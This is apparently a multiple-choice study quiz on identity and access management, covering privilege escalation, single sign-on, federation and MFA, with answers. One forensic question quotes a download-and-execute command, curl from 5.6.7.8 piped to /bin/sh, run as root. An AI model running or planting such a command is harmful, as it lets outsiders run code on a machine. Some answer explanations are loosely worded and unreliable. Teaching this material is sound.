Chapter 8 - Identity and Access Management Security (IAM)
An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack? To delete access to event logs. To lay a foundation for later. To limit user privileges. To check for system vulnerabilities.
Privilege escalation attacks are often laying the foundation for a larger cyberattack. They use these kinds of attacks so that they can have the proper privileges to carry out a successful breach.
Which of the following allows users to sign into a single trusted account, such as Google or Facebook? SP SSO SAML IDP
SSO Single sign-on (SSO) is a process that allows users to sign into a single trusted account, such as Google or Facebook.
An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.) Save the event log. Install malware on the system. Steal confidential information. Access lower privilege users. Limit user privileges.
With administrative privileges, a hacker can carry out a wide variety of malicious activities, such as installing malware or viruses, running administrative commands in a malicious way, or stealing confidential information.
Which of the following is a trust relationship that exists between different organizations or applications? Federation Identity and access management Multi-factor authentication Assertion
A federation is a trust relationship that exists between different organizations or applications.
You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced? A horizontal privilege escalation attack A vertical privilege escalation attack A password stuffing attack A brute force attack
A horizontal attack is when a user pretends to be a similar user on the same network.
Which of the following BEST describes Central Policy? An authentication process the requires two or more steps. A program that checks for the correct attributes in an attribute-based system. An access management strategy where people are granted privileges based on their role in the organization. An access management strategy where an attribute is created for every element of an organization's operations.
A program that checks for the correct attributes in an attribute-based system. Central Policy is a program that checks for the correct attributes in an attribute-based system.
Which of the following BEST describes horizontal escalation? An attacker using a list of hacked credentials on a variety of sites. An attacker trying to access a user on the same system. An attacker trying a list of common passwords one after another. An attacker trying to access someone with higher privileges.
An attacker trying to access a user on the same system is called horizontal escalation.
Which of the following is a good way to prevent privilege escalation attacks? Obtain administrative privileges. Limit privileges. Run administrative commands. Delete event logs.
By limiting the number of people who have privileges, you can make it more difficult for hackers to find someone vulnerable to impersonate. It's also easier to monitor a smaller pool of users who have advanced privileges.
Which of the following is an advantage of setting up a federation? Employees have easier onboarding. Your organization is assigned a set of attributes. There is a preset database of users and their login credentials. Users must enter a PIN.
Employees have easier onboarding.
Which of the following is an example of IAM? Job position Clearance level Entering a PIN File editing
Entering a PIN
Each user on a network must have a unique digital identity. Which of the following is this known as? Attribute-based access control (ABAC) Central Policy Identity and access management (IAM) Role-based access control (RBAC)
Identity and access management (IAM)
You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of? SSO IDP SP MFA
MFA Multi-factor authentication provides an extra layer of security to an account. It is especially useful when using a single sign-on account to make sure it has not been compromised. It takes longer but is also more secure.
Which of the following BEST describes a federation? - Is made up of components that include a user's account name and all the other attributes needed to start a session for the user. - Determines the combination of attributes from users, objects, actions, and environment factors that are needed to perform any given action on a system. - Is an access management strategy where an attribute is created for every element of an organization's operations, such as for time, date, and location. - Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.
Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.
What is it called when permissions are given for a task but then never removed when they are no longer required?
The answer is privilege creep, which is the gradual accumulation of permissions beyond what a person requires to do their job.
Which of the following BEST describes signing in with single sign-on? The website's authentication server verifies the credentials. The user is required to enter a security code. The website verifies the credentials in its database. The website uses more than one way to authenticate a user.
The website's authentication server verifies the credentials. With single sign-on, a website does not have to check its database for user credentials. It relies on a third party, such as Google or Facebook, for authentication.
When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do? It replaced the /bin/sh command with the contents of the 324526.sh command. It copied the contents of the 324526.sh script into a new file called curl.sh, saving it for later execution. It executed the 324526.sh script on a shell on the remote host 5.6.7.8, compromising that remote host. It executed the 334526.sh script locally as the root user.
This curl command is used to copy the contents from a remote location. In this case, it copied the web server at the IP address 5.6.7.8 to the local machine and ran it using /bin/sh. It ran as the root user since this was found in the .bash_history file in the /root directory.
While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced? Horizontal privilege escalation Vertical privilege escalation Password stuffing Brute force attack
This scenario is most likely a vertical privilege escalation attack. This type of attack deals with a user trying to get higher rights than they usually have.
Which of the following BEST describes signing in without single sign-on? The website does not have to check its database for user credentials. The website uses more than one way to authenticate a user. The website provides an extra layer of security to an account. The website must have its own database of user credentials.
When you sign in without single sign-on, the website must have its own database of user credentials.
Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security? You could obtain administrator privileges. You could grant users more privileges. You could regularly scan your system for vulnerabilities. You could regularly delete event logs.
You should regularly scan your system for vulnerabilities; this will help you understand how hackers are getting into your system.